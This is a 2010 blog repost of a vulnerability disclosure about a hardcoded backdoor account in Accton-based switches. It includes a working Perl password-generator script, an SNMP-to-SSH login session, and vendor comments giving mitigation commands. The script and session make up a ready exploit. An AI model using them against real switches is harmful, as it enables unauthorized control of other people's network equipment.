Backdoor Password in Accton Based Switches

Posted: 2nd September 2010 by Matt in code, hacks, security
Tags: , , , , , , , , , , , , , , , , ,
9

This just came across and it’s pretty interesting. I haven’t heard of/seen this before, so I figured I’d repost it here. I don’t usually like to regurgitate stuff, but if I have nothing to write myself and I come across something that I consider to be valuable, interesting, insightful, or whatever, I will. :-)

[BEGIN REGURGITATION of http://www.exploit-db.com/exploits/14875/]

On the 15th of august 2009, at the HAR2009 conference, the existence of a backdoor password in Accton-based switches was revealed by Edwin Eefting, Erik Smit and Erwin Drent [1][2]. Even though this is a >365-day exploit, it does not seem to be listed in any of the vulnerability databases. Also, I could not find a patch for any of the vulnerable devices. According to the researchers, they contacted 3Com and Accton, but did not receive a response. I have a vulnerable 3Com 3812 in my lab and contacted the 3Com SRT months ago, but did not receive a response either. This seems to be a forgotten bug…

The Accton company builds switches, which are rebranded and sold by several manufacturers (including 3Com, Dell, SMC, Foundry and EdgeCore). The researchers list at least the 3Com 3812, 3Com 3870 and Edgecore ES4649 as vulnerable[3], but other vendors are affected as well. For example, I could also reproduce the behavior on a Dell PowerConnect 5224 switch.

The backdoor password can be calculated if you have the switch MAC-address, which can be obtained via ARP or SNMP (if you know the community string). It seems to work on all management interfaces: telnet, ssh and http. If you don’t know the MAC-address but can guess the OUI, brute forcing the password is probably feasible as well. A perl script (accton.pl) to calculate the password from the MAC address is available at [4].

I’m hoping as a result of this e-mail, this will end up in vulnerability databases, scanners etc. I believe more vulnerable devices will show up as people start scanning their networks.

A sample SSH session with my 3Com 3812, running the latest available firmware (2.00):

$ snmpget -v1 -c public 192.168.104.99 IF-MIB::ifPhysAddress.1001
IF-MIB::ifPhysAddress.1001 = STRING: 0:d:54:9d:1b:90

[Matt's Note:]
If you’re on the same network segment as the switch, rather than using SNMP, use nmap, arping, or arp to get the MAC address.
[End of Matt's Note]

$ perl accton.pl 0:d:54:9d:1b:90
!F!RELUO

$ ssh __super@192.168.104.99
__super@192.168.104.99′s password: !F!RELUO

Menu options: ——-3Com SuperStack 3 Switch 3812 12-port———————
bridge – Administer bridge-wide parameters
feature – Administer system features
gettingStarted – Basic device configuration
logout – Logout of the Command Line Interface
physicalInterface – Administer physical interfaces
protocol – Administer protocols
security – Administer security
system – Administer system-level functions
trafficManagement – Administer traffic management

Type ? for help.
————————————- (1)————————————–
Select menu option:

————————————-references——————————–
[1] HAR2009 talk https://har2009.org/program/events/103.en.html
[2] HAR2009 slides http://www.vettebak.nl/hak/
[3] Backdoor description http://stuff.zoiah.net/doku.php?id=accton:backdoor
[4] Exploit calculator http://www.vettebak.nl/hak/accton.pl
—————————————EOF————————————-

?View Code PERL
#!/usr/bin/perl -w
use strict;
 
# Accton Mercury "__super" user proof of concept
# Disassembling and first PoC - smite@zylon.net.
# Disassembling and math - psy@datux.nl, gido@datux.nl
 
my $counter;
my $char;
 
my $mac = $ARGV[0];
my @mac;
 
foreach my $octet (split (":", $mac)) {
  push @mac, hex($octet);
}
 
if (!defined $mac[5]) {
    print "Usage: ./accton.pl 00:01:02:03:04:05\n";
    exit 1;
}
 
sub printchar {
    my ($char) = @_;
 
    $char = $char % 0x4b;
 
    if ($char <= 9 || ($char > 0x10 && $char < 0x2a) || $char > 0x30) {
        print pack("c*", $char+0x30);
    } else {
        print "!";
    }
}
 
 
for ($counter=0;$counter<5;$counter++) {
    $char = $mac[$counter];
    $char = $char + $mac[$counter+1];
    printchar($char);
}
 
for ($counter=0;$counter<3;$counter++) {
    $char = $mac[$counter];
    $char = $char + $mac[$counter+1];
    $char = $char +  0xF;
    printchar($char);
}
 
print "\n";
 
# Vereenvoudiging van de loop:
# Was dit:
#     $r11 = ($char * $key) >> 0x23;
#     $r10 = $char >> 0x1F;
#     $r9 = $r11 - $r10;
#     $r11 = $r9 << 2;
#     $r11 = $r11 + $r9;
#     $r9 = $r11 << 4;
#     $r9 = $r9 - $r11;
#     $char = $char - $r9;
#     $char = $char & 0xff;
# Alles substen en bitshifts omrekenen:
# #   $char = $char  - ( (( ( (($char * $key) / 34359738368)  - ($char / 2147483648)) * 4 ) + ((($char * $key) / 34359738368)  - ($char / 2147483648) ) ) * 15) ;
# Vervolgens vereenvoudigen:
# #     $char = $char  - (
# #     (
# #         ( (
# #             (($char * $key) / 34359738368)  - ($char / 2147483648)
# #         ) * 4 )
# #         +
# #         (
# #             (($char * $key) / 34359738368)  - ($char / 2147483648)
# #         )
# #     ) * 15
# #     ) ;
# #     $char = $char  - (
# #     (
# #         ( (
# #             4*( ($char * $key) / 34359738368)  - 4*($char / 2147483648)
# #         ) )
# #         +
# #         (
# #             (($char * $key) / 34359738368)  - ($char / 2147483648)
# #         )
# #     ) * 15
# #     ) ;
# Termen die afgerond altijd 0 zijn vallen weg!
# print "char is $char (max is 510)\n";
# print 510 / 2147483648  ."\n";
# print "\n";
# Dit kun je zien als bitshifts die alle bits naar rechts shiften:
# #     $char = $char  - (
# #     (
# #         ( (
# #             (4* ( $char * $key / 34359738368)  ) 
# #         ) )
# #         +
# #         (
# #             (($char * $key) / 34359738368)  - ($char / 2147483648)
# #         )
# #     ) * 15
# #     ) ;
# #     $char = $char  - (
# #     (
# #         ( (
# #             (4* ( $char * $key / 34359738368)  ) 
# #         ) )
# #         +
# #         (
# #             (($char * $key) / 34359738368)  
# #         )
# #     ) * 15
# #     ) ;
# #     $char = $char  - (
# #     (
# #         ( (
# #             (5* ( $char * $key / 34359738368)  ) 
# #         ) )
# #     ) * 15
# #     ) ;
# #     $char = $char  - (75* ( $char * $key / 34359738368)   )  ;
# # Dit is een shift naar rechts van 35:
# #     $char = $char  - (75* ( $char * $key >> 35)   )  ;
# PWNED! ;)
#
#after printing out all the possible combinations, the only thing left was a modulo function!!!
#double pownage!!
# my $output;
# for ($char=0;$char<=0x1FE;$char++) {
#   $output = $char - (75 * (($char * 0x1B4E81B5 ) >> 35)   )  ;
#  
#   my $cool;
#   $cool = $char % 75 ;
#
#   if ($cool != $output)
#   {  
#       print "$char word $output en is cool $cool\n";
#   }
# }

[END OF REGURGITATION]

If you enjoyed this post, make sure you subscribe to my RSS feed! You can also follow me on Twitter here.
Share

Related posts:

  1. Perl Password Generator
  2. FreeBSD 8.*, 7.* Local ‘root’ Exploit
  3. New DLL Hijacking Exploits (many!)
  4. How your passwords get hacked.
  5. The Benefit of a Strong Password
  1. Steve says:
    September 2, 2010 at 2:43 pm

    “I don’t understand why you would bother with snmp to get the MAC address. Kind of like using a sledge hammer to drive a tack. Nmap, arping, arp, etc. are all feasible ways to get the MAC address.”

    ARP is certainly the best way if the switch you are attacking is in the same broadcast domain, but the SNMP method would from a different segment.

  2. Matt says:
    September 3, 2010 at 1:03 am

    @Steve: Good point, didn’t even consider that. I stand corrected. :-)

  3. psy says:
    September 3, 2010 at 4:47 am

    The reason to use SNMP instead of ARP is that you can use it over the internet (if its not firewalled etc), while the other methods require you to be on the same ethernet segment.

  4. Week 35 in Review – 2010 | Portable Digital Video Recorder says:
    September 6, 2010 at 12:52 am

    [...] Backdoor Password in Accton Based Switches – attackvector.org On the 15th of august 2009, at the HAR2009 conference, the existence of a backdoor password in Accton-based switches was revealed by Edwin Eefting, Erik Smit and Erwin Drent. [...]

  5. CK says:
    September 8, 2010 at 6:33 am

    hi, Matt,
    Thanks for bringing up this security issue.
    In order to help customer who forgot the password and doesn’t want to loss the configuration to login the switch to change the existing password. So we provided this mechanism if customer provide us the MAC address of the his switch, we will generate a unique password for such switch for him/her. It is regret the it come out to be a security issue.

  6. CK says:
    September 8, 2010 at 6:46 am

    Last year, when we received this information that somebody break the algorithm, we had already changed our firmware so that this password can’t be used via Telnet, Web etc protocol via network. Only when the administrator can physically reach the switch via console login, then this password is valid.

    Some of the switches which had been phased out may still have the problem, If any customer has such concern, please contact us, we will take the full responsibility to help him/her fix the problem.

    Thanks again for your attention to prevent people using our switches from being attack. It is also our responsibility. Should you have any suggestion or comment, please feel free to contact me.

    Best Regards
    C.K.NG

  7. Matt says:
    September 8, 2010 at 9:45 am

    @CK: I understand your argument, but my take is this:

    If, say, 2% of your customer base forget their passwords and have to reset their devices and start from scratch, why would you put the other 98% of your customer base at risk for getting owned? Personally, if I ran one of your routers/switches/whatever and found out that I had lost trade secrets or valuable information due to a hole that your company intentionally put in to my router/switch, you would have a lawsuit on your hands.

    It is not your responsibility to provide a way for your customers to log in to their device if they’ve forgotten their password. If they’ve made the mistake of setting a password and not documenting it, remembering it, something, that is not your company’s issue – it’s theirs. And, if they have to reset their router/switch as a result of their carelessness, maybe the task of reconfiguring the router will make them be a little more diligent the next time.

    All of us have forgotten our passwords to something at some point in our lives. I’ve hit the “reset” button on many devices in my day due to not having documented a password. This is my own fault and I accept that.

  8. CK says:
    September 9, 2010 at 11:00 pm

    Dear Matt,
    Thanks for your comment, you are absolutely correct. but it also showed that our company is care about customer, even they are the 2%.

    Anyway I think if customer use the switch properly, it won’t be attacked by the super password issue.

    Firstly, normally customer will separate the user vlan from management vlan, so user can reach the switch.

    Secondary, even if user and switch in the same vlan (subnet), or the management vlan can be accessed by routing, we still have a way to prevent switch from attack,

    by using the command showing below, only specified management IP can access the switch.

    Console#config
    Console(config)#management ?
    all-client Adds IP addresses to SNMP, Web and Telnet groups
    http-client Adds IP addresses to the Web group
    snmp-client Adds IP addresses to the SNMP group
    telnet-client Adds IP addresses to the Telnet group
    Console(config)#management all-client ?
    A.B.C.D Starts IP address
    Console(config)#management all-client 192.168.1.1 ?
    A.B.C.D Ends IP address

    Console(config)#management all-client 192.168.1.1 192.168.1.10

    only IP address within 192.168.1.1-10 can access the switch via telnet, http, snmp or all

    using this way, user also can’t get mac of the switch via SNMP

    Please comment if it address your connern. Thanks.

  9. CK says:
    September 9, 2010 at 11:07 pm

    Please also don’t forget to change the default username and password

    Console(config)#no username guest
    Console(config)#no username admin
    Console(config)#username ck_ng password 0 Support
    Console(config)#enable password level 15 0 Support

    From log you can also see who is login to the switch

    Console#sh log ram

    [488] 02:11:09 2001-01-01
    “LoginSuccess,__super,WEB,10.2.32.162″

    [20] 00:11:58 2001-01-01
    “LoginSuccess,ck_ng,Console,10.2.4.21″
    level: 6, module: 5, function: 1, and event no.: 1

    [18] 00:11:34 2001-01-01
    “LoginFailure,guest,Console,10.2.4.21″

    [15] 00:09:29 2001-01-01
    “LoginFailure,admin,Console,10.2.4.21″
    level: 6, module: 5, function: 1, and event no.: 1

Spam Protection by WP-SpamFree